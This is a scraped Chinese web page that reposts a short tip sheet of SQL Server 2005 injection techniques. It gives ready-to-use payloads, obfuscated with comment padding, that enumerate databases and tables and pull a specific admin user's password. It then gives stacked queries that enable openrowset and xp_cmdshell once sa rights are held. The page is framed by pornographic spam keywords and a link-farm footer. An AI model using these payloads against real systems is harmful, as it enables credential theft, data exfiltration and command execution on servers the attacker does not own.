国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 數(shù)據(jù)庫 > SQL Server > 正文

mssql2005注入方法小結(jié)

2024-08-31 01:00:02
字體:
供稿:網(wǎng)友
爆庫語句,修改紅色部分的數(shù)字挨個猜出庫
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--

爆表語句,somedb部份是所要列的數(shù)據(jù)庫,紅色數(shù)字1累加
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--

爆字段語句,爆表admin里user='icerover'的密碼段
/**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--

mssql2005默認(rèn)沒有開xp_cmdshell的,openrowset也不能用
如果是sa權(quán)限,可以這樣來開啟

開啟openrowset
EXEC/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--

開啟xp_cmdshell
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
發(fā)表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發(fā)表
主站蜘蛛池模板: 神池县| 张家港市| 高邮市| 从江县| 丰镇市| 靖边县| 宝兴县| 蓝田县| 弥渡县| 忻城县| 宜都市| 五大连池市| 彩票| 微山县| 鄂伦春自治旗| 赤峰市| 博爱县| 崇义县| 芦山县| 囊谦县| 吉首市| 阜南县| 子洲县| 城口县| 石河子市| 梅河口市| 莒南县| 云浮市| 崇阳县| 长春市| 西畴县| 德保县| 大宁县| 彭山县| 开原市| 延吉市| 垣曲县| 德保县| 东安县| 乌兰浩特市| 崇信县|